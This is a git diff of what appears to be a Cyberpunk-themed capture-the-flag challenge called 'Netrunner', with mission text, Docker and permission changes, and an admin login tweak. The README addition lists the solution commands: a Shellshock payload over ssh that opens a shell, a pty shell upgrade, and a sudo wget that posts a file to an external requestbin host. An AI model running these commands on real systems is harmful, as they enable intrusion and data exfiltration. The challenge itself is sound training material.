diff --git a/README.md b/README.md index 430562a..6a9c0f5 100644 --- a/README.md +++ b/README.md @@ -1 +1,63 @@ # Netrunner + +chmod 777 mariadb + + +### + +ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i' + +python3 -c 'import pty; pty.spawn("/bin/sh")' + +sudo -g zetatech-maintenance wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX + + +hint Netrunner 2/3: He seems to have a "ghost" in the shell + + + + + +

V, I got a mission for you!

+We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address:
+http://149.202.58.152:8080

+Find out who he is and a way to stop him.

+ + + +

Nice V! I owe you one!

+But before we go to visit him, I would like to have a means of pressure. +Here is his maintenance access:
+http://149.202.58.152:2222

+See what you can do and let me know.

+ + +

You doing great!

+But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.

+It will allow us to unplug it in case of a glitch.

diff --git a/debian-ssh/Dockerfile b/debian-ssh/Dockerfile index 38e8b73..9d6046e 100644 --- a/debian-ssh/Dockerfile +++ b/debian-ssh/Dockerfile @@ -56,9 +56,9 @@ COPY ./banner /etc/banner # Configure permissions RUN chmod -R 550 /home/${user} \ - && chown -R ${user}:${user} /home/${user}/.ssh \ - && chmod 500 /home/${user}/.ssh \ - && chmod 400 /home/${user}/.ssh/authorized_keys \ + && chown -R root:${user} /home/${user} \ + && chmod 750 /home/${user}/.ssh \ + && chmod 440 /home/${user}/.ssh/authorized_keys \ && chmod 773 /tmp \ && chmod +t /tmp diff --git a/docker-compose.yml b/docker-compose.yml index c251701..7b658bf 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,4 +1,4 @@ -version: '3' +version: '2.2' services: web: @@ -39,3 +39,4 @@ services: ports: - "2222:22" restart: always + cpus: '.3' diff --git a/webroot/zetatech-admin.php b/webroot/zetatech-admin.php index e5637cf..a97591f 100644 --- a/webroot/zetatech-admin.php +++ b/webroot/zetatech-admin.php @@ -47,10 +47,14 @@ if (isset($_POST['login']) && $_POST['login'] == 'Login') { "; $state->string = $html_login; + } elseif ( $num_row == 1 && $row['user'] === 'admin') { + $state->return = 'false'; + $state->string = 'admin is desactivated. Use your login.'; } else { $state->return = 'false'; $state->string = 'Access Denied'; } + } else { $state->return = 'password'; $state->string = 'Password Missing';